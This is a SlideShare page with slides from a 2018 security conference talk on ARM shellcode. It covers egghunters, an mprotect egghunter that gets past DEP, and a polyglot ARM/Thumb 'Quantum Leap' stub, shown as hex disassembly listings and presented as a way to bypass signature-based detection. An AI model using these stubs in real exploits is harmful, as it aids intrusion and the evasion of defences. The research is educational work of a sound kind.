SlideShare una empresa de Scribd logo

Make ARM Shellcode Great Again

Saumil Shah
Saumil Shah

Slides from my presentation on ARM Shellcode at #44CON 2018, London. In this talk, we explore ARM egghunting and "Quantum Leap" code - polyglot ARM shellcode. A bonus side effect of this talk will be creating headaches for those who like to defend agaisnt attacks using age old signature based techniques.

Software
1 de 20
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Make ARM Shellcode Great Again Saumil Shah @therealsaumil 13 September 2018
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON # who am i CEO Net-square. • Hacker, Speaker, Trainer, Author. • M.S. Computer Science Purdue University. • LinkedIn: saumilshah • Twitter: @therealsaumil
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Agenda • A background on ARM shellcode • My research around ARM shellcode – cache coherency (solved before) – space limitations – polyglot tricks • Demos
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Shellcode in tight spaces • Egghunter: • Searches for an EGG (4+4 byte value) in the process memory. • Uses syscalls to determine whether a memory page exists or not (safely). • Upon finding it, Egghunter transfers the control to the code following the egg. • Nothing new here - done before.
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Egghunter - Common Problems • DEP • If Egg+shellcode is in a different memory region, then it may not be executable • e.g. Stack overflow, shellcode in the heap. • ROP chains? • Enter the mprotect egghunter!
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON mprotect Egghunter heap stack Lib Lib Binary shellcodeHACKHACK overflow ROP mprotect egghunter RWX RWX RWX RWX RWX RWX RWX RWX gef> vmmap Start End Perm Path 0x00008000 0x00009000 rwx /home/pi/eggbreak 0x00010000 0x00011000 rwx /home/pi/eggbreak 0x00011000 0x00012000 rwx [heap] 0x00012000 0x00032000 rw- [heap] 0xb6e9c000 0xb6fbe000 r-x /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fbe000 0xb6fc5000 --- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc5000 0xb6fc7000 r-- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc7000 0xb6fc8000 rw- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc8000 0xb6fcb000 rw- 0xb6fd8000 0xb6ff5000 r-x /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffa000 0xb6ffd000 rw- 0xb6ffd000 0xb6ffe000 r-- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffe000 0xb6fff000 rw- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6fff000 0xb7000000 r-x [sigpage] 0xbefdf000 0xbeffe000 rw- 0xbeffe000 0xbf000000 rwx [stack]
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON DEMO mprotect egghunter
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON ARM Shellcode Polyglot Tricks • Common trick in ARM shellcode is to switch to Thumb mode at the beginning. • The "I can signature this" debate. – YARA Rules, IDS, Bro, blah blah… • What if our target is a Thumb-only processor? – example: Cortex-M • One Shellcode To Run Them All
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON "Quantum Leap" Shellcode Start in THUMB modeStart in ARM mode THUMB shellcode (execve, reverse, …) THUMB shellcode (execve, reverse, …) "LEAP" TO THUMB PASS THROUGH PASS THROUGH PASS THROUGH Quantum Leap Same Same But Different
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON "Quantum Leap" - what we need • An understanding of ARM and Thumb encoding: – ARM instruction: "DO SOMETHING" – 2 THUMB instructions: "PASS THROUGH" • Conditional Execution in ARM instructions – very helpful! • A little bit of luck and perseverance. • Nomenclature Credit: "dialup".
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Simple ARM to Thumb switch • Avoid Branches, Load/Store, Floating Point, etc. • Should work on ARMv6. – avoid Thumb2 instructions • Avoid Illegal instructions. 0: e28f1001 add r1, pc, #1 4: e12fff11 bx r1 8: 270b movs r7, #11 a: beff bkpt 0x00ff 0: 1001 asrs r1, r0, #32 2: e28f b.n 524 4: ff11 e12f vrhadd.u16 d14,d1,d31 8: 270b movs r7, #11 a: beff bkpt 0x00ff ORIGINAL ARM CODE "THUMB VIEW"
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON ARM and THUMB decoding - 1 e28f1001: 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 4 BYTE ARM INSTRUCTION: conditional opcodestatus operand 1 destination operand 2 Thumb instruction 2 Thumb instruction 1 • Controlled by opcode and conditional flags. • Partially influenced by the first operand. • Trickier to control. • Controlled by Operands of the ARM instruciton. • Easier to control. im m ediate
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON ARM and THUMB decoding - 1 e28f1001: 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 1001: 0001 0000 0000 0001 asrs r1,r0,#32 e28f: 1110 0010 1000 1111 b 524 1 ARM INSTRUCTION RESULTING INTO 2 THUMB INSTRUCTIONS: conditional opcodestatus operand 1 destination operand 2 im m ediate Branch instructions are destructive Thumb Opcode influenced by ARM conditional bits
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON (Un)conditional Instructions • How can we turn an ARM instruction into a conditional instruction… • …with guaranteed execution everytime? • COMPLIMENTARY CONDITIONS. • One of the instructions is guaranteed to execute, irrespective of condition flags. e28f1001 add r1, pc, #1 128f1005 addne r1, pc, #5 028f1001 addeq r1, pc, #1 UNCONDITIONAL INSTRUCTION COMPLIMENTARY CONDITIONS
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON ARM and THUMB decoding - 2 128f1005: 0001 0010 1000 1111 0001 0000 0000 0101 addne r1,pc,#5 1005: 0001 0000 0000 0101 asrs r5,r0,#32 128f: 0001 0010 1000 1111 asrs r7,r1,#10 028f1001: 0000 0010 1000 1111 0001 0000 0000 0001 addeq r1,pc,#1 1001: 0001 0000 0000 0001 asrs r1,r0,#32 028f: 0000 0010 1000 1111 lsls r7,r1,#10 USING CONDITIONAL ARM INSTRUCTIONS: conditional opcodestatus operand 1 destination operand 2 im m ediate No destructive instructions in Thumb mode Complimentary Conditional ARM instructions
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Final "Quantum Leap" Code 0: 228fa019 addcs sl, pc, #25 4: 328fa015 addcc sl, pc, #21 8: 21a0400d movcs r4, sp c: 31a0400d movcc r4, sp 10: 292d0412 pushcs {r1, r4, sl} 14: 392d0412 pushcc {r1, r4, sl} 18: 28bda002 popcs {r1, sp, pc} 1c: 38bda002 popcc {r1, sp, pc} 20: beff bkpt 0x00ff 22: beff bkpt 0x00ff 0: a019 add r0, pc, #100 2: 228f movs r2, #143 4: a015 add r0, pc, #84 6: 328f adds r2, #143 8: 400d ands r5, r1 a: 21a0 movs r1, #160 c: 400d ands r5, r1 e: 31a0 adds r1, #160 10: 0412 lsls r2, r2, #16 12: 292d cmp r1, #45 14: 0412 lsls r2, r2, #16 16: 392d subs r1, #45 18: a002 add r0, pc, #8 1a: 28bd cmp r0, #189 1c: a002 add r0, pc, #8 1e: 38bd subs r0, #189 20: beff bkpt 0x00ff 20: beff bkpt 0x00ff QUANTUM LEAP: ARM TO THUMB QUANTUM LEAP: THUMB TO THUMB
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Assembling the Quantum Leap • No Thumb2 instructions. • No NULL bytes. • Many iterations. • bx sl implemented by push {sl}, pop {pc}. • Register list proved to be a challenge. • Registers r4, sl altered (in ARM). • Registers r0, r1, r2, r3 altered (in Thumb).
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON DEMO Quantum Leap Shellcode
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Conclusion • ARM/Thumb Polyglot instructions and conditional execution offer many opportunities for obfuscation and signature bypass. • Lots of exploration opportunities in ARM shellcoding. https://github.com/therealsaumil/arm_shellcode
NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON exit() Saumil Shah @therealsaumil #44CON 2018

Recomendados

Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
Saumil Shah
 
[KubeCon EU 2022] Running containerd and k3s on macOS
[KubeCon EU 2022] Running containerd and k3s on macOS[KubeCon EU 2022] Running containerd and k3s on macOS
[KubeCon EU 2022] Running containerd and k3s on macOS
Akihiro Suda
 
ARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation Workshop
Saumil Shah
 
Java NIO.2
Java NIO.2Java NIO.2
Java NIO.2
*instinctools
 
Installing and Running Postfix within a Docker Container
Installing and Running Postfix within a Docker ContainerInstalling and Running Postfix within a Docker Container
Installing and Running Postfix within a Docker Container
Docker, Inc.
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
Christopher Frohoff
 
Quickboot on i.MX6
Quickboot on i.MX6Quickboot on i.MX6
Quickboot on i.MX6
Gary Bisson
 
CentOS Linux Server Hardening
CentOS Linux Server HardeningCentOS Linux Server Hardening
CentOS Linux Server Hardening
MyOwn Telco
 

Recomendados

Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
Saumil Shah
 
[KubeCon EU 2022] Running containerd and k3s on macOS
[KubeCon EU 2022] Running containerd and k3s on macOS[KubeCon EU 2022] Running containerd and k3s on macOS
[KubeCon EU 2022] Running containerd and k3s on macOS
Akihiro Suda
 
ARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation Workshop
Saumil Shah
 
Java NIO.2
Java NIO.2Java NIO.2
Java NIO.2
*instinctools
 
Installing and Running Postfix within a Docker Container
Installing and Running Postfix within a Docker ContainerInstalling and Running Postfix within a Docker Container
Installing and Running Postfix within a Docker Container
Docker, Inc.
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
Christopher Frohoff
 
Quickboot on i.MX6
Quickboot on i.MX6Quickboot on i.MX6
Quickboot on i.MX6
Gary Bisson
 
CentOS Linux Server Hardening
CentOS Linux Server HardeningCentOS Linux Server Hardening
CentOS Linux Server Hardening
MyOwn Telco
 
Linux Internals - Part I
Linux Internals - Part ILinux Internals - Part I
Linux Internals - Part I
Emertxe Information Technologies Pvt Ltd
 
malloc & vmalloc in Linux
malloc & vmalloc in Linuxmalloc & vmalloc in Linux
malloc & vmalloc in Linux
Adrian Huang
 
Secure storage updates - SFO17-309
Secure storage updates - SFO17-309Secure storage updates - SFO17-309
Secure storage updates - SFO17-309
Linaro
 
OPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build TutorialOPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build Tutorial
Dalton Valadares
 
AndroidとSELinux
AndroidとSELinuxAndroidとSELinux
AndroidとSELinux
android sola
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
Christopher Frohoff
 
Android Storage - Vold
Android Storage - VoldAndroid Storage - Vold
Android Storage - Vold
William Lee
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhyd
n|u - The Open Security Community
 
Unix And Shell Scripting
Unix And Shell ScriptingUnix And Shell Scripting
Unix And Shell Scripting
Jaibeer Malik
 
LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3
LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3
LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3
Linaro
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
Will Schroeder
 
BUD17-416: Benchmark and profiling in OP-TEE
BUD17-416: Benchmark and profiling in OP-TEE BUD17-416: Benchmark and profiling in OP-TEE
BUD17-416: Benchmark and profiling in OP-TEE
Linaro
 
Brute Force Attack and Its Prevention.pptx
Brute Force Attack and Its Prevention.pptxBrute Force Attack and Its Prevention.pptx
Brute Force Attack and Its Prevention.pptx
hamzajawad10
 
Fast as C: How to Write Really Terrible Java
Fast as C: How to Write Really Terrible JavaFast as C: How to Write Really Terrible Java
Fast as C: How to Write Really Terrible Java
Charles Nutter
 
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
Ji-Woong Choi
 
Asynchronous JS in Odoo
Asynchronous JS in OdooAsynchronous JS in Odoo
Asynchronous JS in Odoo
Odoo
 
Web Hacking (basic)
Web Hacking (basic)Web Hacking (basic)
Web Hacking (basic)
Ammar WK
 
Linux Internals - Part II
Linux Internals - Part IILinux Internals - Part II
Linux Internals - Part II
Emertxe Information Technologies Pvt Ltd
 
HAVOC-Workshop-Slides.pptx
HAVOC-Workshop-Slides.pptxHAVOC-Workshop-Slides.pptx
HAVOC-Workshop-Slides.pptx
seed4mexyz
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat Security Conference
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
Saumil Shah
 
HackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainHackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great Again
Saumil Shah
 

Más contenido relacionado

La actualidad más candente

Linux Internals - Part I
Linux Internals - Part ILinux Internals - Part I
Linux Internals - Part I
Emertxe Information Technologies Pvt Ltd
 
malloc & vmalloc in Linux
malloc & vmalloc in Linuxmalloc & vmalloc in Linux
malloc & vmalloc in Linux
Adrian Huang
 
Secure storage updates - SFO17-309
Secure storage updates - SFO17-309Secure storage updates - SFO17-309
Secure storage updates - SFO17-309
Linaro
 
OPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build TutorialOPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build Tutorial
Dalton Valadares
 
AndroidとSELinux
AndroidとSELinuxAndroidとSELinux
AndroidとSELinux
android sola
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
Christopher Frohoff
 
Android Storage - Vold
Android Storage - VoldAndroid Storage - Vold
Android Storage - Vold
William Lee
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhyd
n|u - The Open Security Community
 
Unix And Shell Scripting
Unix And Shell ScriptingUnix And Shell Scripting
Unix And Shell Scripting
Jaibeer Malik
 
LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3
LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3
LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3
Linaro
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
Will Schroeder
 
BUD17-416: Benchmark and profiling in OP-TEE
BUD17-416: Benchmark and profiling in OP-TEE BUD17-416: Benchmark and profiling in OP-TEE
BUD17-416: Benchmark and profiling in OP-TEE
Linaro
 
Brute Force Attack and Its Prevention.pptx
Brute Force Attack and Its Prevention.pptxBrute Force Attack and Its Prevention.pptx
Brute Force Attack and Its Prevention.pptx
hamzajawad10
 
Fast as C: How to Write Really Terrible Java
Fast as C: How to Write Really Terrible JavaFast as C: How to Write Really Terrible Java
Fast as C: How to Write Really Terrible Java
Charles Nutter
 
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
Ji-Woong Choi
 
Asynchronous JS in Odoo
Asynchronous JS in OdooAsynchronous JS in Odoo
Asynchronous JS in Odoo
Odoo
 
Web Hacking (basic)
Web Hacking (basic)Web Hacking (basic)
Web Hacking (basic)
Ammar WK
 
Linux Internals - Part II
Linux Internals - Part IILinux Internals - Part II
Linux Internals - Part II
Emertxe Information Technologies Pvt Ltd
 
HAVOC-Workshop-Slides.pptx
HAVOC-Workshop-Slides.pptxHAVOC-Workshop-Slides.pptx
HAVOC-Workshop-Slides.pptx
seed4mexyz
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat Security Conference
 

La actualidad más candente (20)

Linux Internals - Part I
Linux Internals - Part ILinux Internals - Part I
Linux Internals - Part I
 
malloc & vmalloc in Linux
malloc & vmalloc in Linuxmalloc & vmalloc in Linux
malloc & vmalloc in Linux
 
Secure storage updates - SFO17-309
Secure storage updates - SFO17-309Secure storage updates - SFO17-309
Secure storage updates - SFO17-309
 
OPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build TutorialOPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build Tutorial
 
AndroidとSELinux
AndroidとSELinuxAndroidとSELinux
AndroidとSELinux
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
Android Storage - Vold
Android Storage - VoldAndroid Storage - Vold
Android Storage - Vold
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhyd
 
Unix And Shell Scripting
Unix And Shell ScriptingUnix And Shell Scripting
Unix And Shell Scripting
 
LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3
LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3
LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
BUD17-416: Benchmark and profiling in OP-TEE
BUD17-416: Benchmark and profiling in OP-TEE BUD17-416: Benchmark and profiling in OP-TEE
BUD17-416: Benchmark and profiling in OP-TEE
 
Brute Force Attack and Its Prevention.pptx
Brute Force Attack and Its Prevention.pptxBrute Force Attack and Its Prevention.pptx
Brute Force Attack and Its Prevention.pptx
 
Fast as C: How to Write Really Terrible Java
Fast as C: How to Write Really Terrible JavaFast as C: How to Write Really Terrible Java
Fast as C: How to Write Really Terrible Java
 
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
 
Asynchronous JS in Odoo
Asynchronous JS in OdooAsynchronous JS in Odoo
Asynchronous JS in Odoo
 
Web Hacking (basic)
Web Hacking (basic)Web Hacking (basic)
Web Hacking (basic)
 
Linux Internals - Part II
Linux Internals - Part IILinux Internals - Part II
Linux Internals - Part II
 
HAVOC-Workshop-Slides.pptx
HAVOC-Workshop-Slides.pptxHAVOC-Workshop-Slides.pptx
HAVOC-Workshop-Slides.pptx
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
 

Similar a Make ARM Shellcode Great Again

Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
Saumil Shah
 
HackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainHackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great Again
Saumil Shah
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
Saumil Shah
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
Saumil Shah
 
Reverse engineering of binary programs for custom virtual machines
Reverse engineering of binary programs for custom virtual machinesReverse engineering of binary programs for custom virtual machines
Reverse engineering of binary programs for custom virtual machines
SmartDec
 
Digging for Android Kernel Bugs
Digging for Android Kernel BugsDigging for Android Kernel Bugs
Digging for Android Kernel Bugs
Jiahong Fang
 
A Close Look at ARM Code Size
A Close Look at ARM Code SizeA Close Look at ARM Code Size
A Close Look at ARM Code Size
Samsung Open Source Group
 
Basics Of Embedded Systems
Basics Of Embedded SystemsBasics Of Embedded Systems
Basics Of Embedded Systems
arlabstech
 
.NET Fest 2019. Łukasz Pyrzyk. Daily Performance Fuckups
.NET Fest 2019. Łukasz Pyrzyk. Daily Performance Fuckups.NET Fest 2019. Łukasz Pyrzyk. Daily Performance Fuckups
.NET Fest 2019. Łukasz Pyrzyk. Daily Performance Fuckups
NETFest
 
An introduction to ROP
An introduction to ROPAn introduction to ROP
An introduction to ROP
Saumil Shah
 
OptimizingARM
OptimizingARMOptimizingARM
OptimizingARM
Jan-Lieuwe Koopmans
 
Arm architecture overview
Arm architecture overviewArm architecture overview
Arm architecture overview
Sathish Arumugasamy
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflows
johseg
 
Arm architecture
Arm architectureArm architecture
Arm architecture
Pantech ProLabs India Pvt Ltd
 
Introduction to PICAXE Microcontrollers
Introduction to PICAXE MicrocontrollersIntroduction to PICAXE Microcontrollers
Introduction to PICAXE Microcontrollers
L. Paul Verhage
 
ARM 64bit has come!
ARM 64bit has come!ARM 64bit has come!
ARM 64bit has come!
Tetsuyuki Kobayashi
 
Data Acquisition
Data AcquisitionData Acquisition
Data Acquisition
azhar557
 
FPGA_BasedGCD
FPGA_BasedGCDFPGA_BasedGCD
FPGA_BasedGCD
Ibrahim Hejab
 
Pragmatic Optimization in Modern Programming - Ordering Optimization Approaches
Pragmatic Optimization in Modern Programming - Ordering Optimization ApproachesPragmatic Optimization in Modern Programming - Ordering Optimization Approaches
Pragmatic Optimization in Modern Programming - Ordering Optimization Approaches
Marina Kolpakova
 
ARM.ppt
ARM.pptARM.ppt
ARM.ppt
MostafaParvin1
 

Similar a Make ARM Shellcode Great Again (20)

Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 
HackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainHackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great Again
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
 
Reverse engineering of binary programs for custom virtual machines
Reverse engineering of binary programs for custom virtual machinesReverse engineering of binary programs for custom virtual machines
Reverse engineering of binary programs for custom virtual machines
 
Digging for Android Kernel Bugs
Digging for Android Kernel BugsDigging for Android Kernel Bugs
Digging for Android Kernel Bugs
 
A Close Look at ARM Code Size
A Close Look at ARM Code SizeA Close Look at ARM Code Size
A Close Look at ARM Code Size
 
Basics Of Embedded Systems
Basics Of Embedded SystemsBasics Of Embedded Systems
Basics Of Embedded Systems
 
.NET Fest 2019. Łukasz Pyrzyk. Daily Performance Fuckups
.NET Fest 2019. Łukasz Pyrzyk. Daily Performance Fuckups.NET Fest 2019. Łukasz Pyrzyk. Daily Performance Fuckups
.NET Fest 2019. Łukasz Pyrzyk. Daily Performance Fuckups
 
An introduction to ROP
An introduction to ROPAn introduction to ROP
An introduction to ROP
 
OptimizingARM
OptimizingARMOptimizingARM
OptimizingARM
 
Arm architecture overview
Arm architecture overviewArm architecture overview
Arm architecture overview
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflows
 
Arm architecture
Arm architectureArm architecture
Arm architecture
 
Introduction to PICAXE Microcontrollers
Introduction to PICAXE MicrocontrollersIntroduction to PICAXE Microcontrollers
Introduction to PICAXE Microcontrollers
 
ARM 64bit has come!
ARM 64bit has come!ARM 64bit has come!
ARM 64bit has come!
 
Data Acquisition
Data AcquisitionData Acquisition
Data Acquisition
 
FPGA_BasedGCD
FPGA_BasedGCDFPGA_BasedGCD
FPGA_BasedGCD
 
Pragmatic Optimization in Modern Programming - Ordering Optimization Approaches
Pragmatic Optimization in Modern Programming - Ordering Optimization ApproachesPragmatic Optimization in Modern Programming - Ordering Optimization Approaches
Pragmatic Optimization in Modern Programming - Ordering Optimization Approaches
 
ARM.ppt
ARM.pptARM.ppt
ARM.ppt
 

Más de Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
Saumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Saumil Shah
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Saumil Shah
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
Saumil Shah
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
Saumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
Saumil Shah
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
Saumil Shah
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
Saumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Saumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
Saumil Shah
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
Saumil Shah
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
Saumil Shah
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
Saumil Shah
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
Saumil Shah
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
Saumil Shah
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
Saumil Shah
 
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation WorkshopHack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
Saumil Shah
 
Cross Border Cyber Attacks: Impact on Digital Sovereignty
Cross Border Cyber Attacks: Impact on Digital SovereigntyCross Border Cyber Attacks: Impact on Digital Sovereignty
Cross Border Cyber Attacks: Impact on Digital Sovereignty
Saumil Shah
 
